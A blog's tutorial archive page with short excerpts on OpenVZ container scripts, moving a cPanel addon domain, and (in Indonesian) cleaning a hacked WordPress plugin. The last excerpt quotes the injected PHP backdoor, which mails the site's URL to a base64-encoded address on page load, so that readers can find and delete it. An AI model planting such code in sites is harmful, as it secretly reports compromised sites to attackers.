Category Archives: Tutorial

openvz scripts

In this article, we’ve put some small scripts that useful for openvz #!/bin/bash ## vzstartall – starts all openvz containers that are currently stopped for arg in `vzlist -HS -o ctid` do echo working on container $arg sudo vzctl start $arg done #!/bin/bash ## vzstopall – stops all running openvz containers echo stopping… Read More »

Move addon domain as a standalone cpanel account

If you need to change an addon domain as a standalone cpanel account, follow these steps: Backup —— 1. Take a full backup of the user from Cpanel 2. Extract the backup onto your PC. Create as stand alone account —————————– 3. Remove that addon domain 4. Create that domain from WHM –> Create new… Read More »

WP mengirimkan banyak email ke

Bila WP anda mengirimkan banyak email ke, ada kemungkinan salah satu plugin anda kena hacked. coba cek file yg ada di plugin anda, kode yang disisipkan seperti ini: add_action(‘wp_head’,’my_wpfunww7c8bb’);function my_wpfunww7c8bb(){if(!username_exists(‘wordpress’)){$addressdecode=base64_decode(“[ redacted ]”);$vari=’WordPress Plugin’;wp_mail($addressdecode,$vari,get_bloginfo(‘wpurl’));}} dimana base64_decode membuat string ‘d29yZHByZXNzc2xvZ0B5YW5kZXguY29t’ Cari file .php yang memuat string tsb dan delete atau disable baris atau fungsi yg memuat… Read More »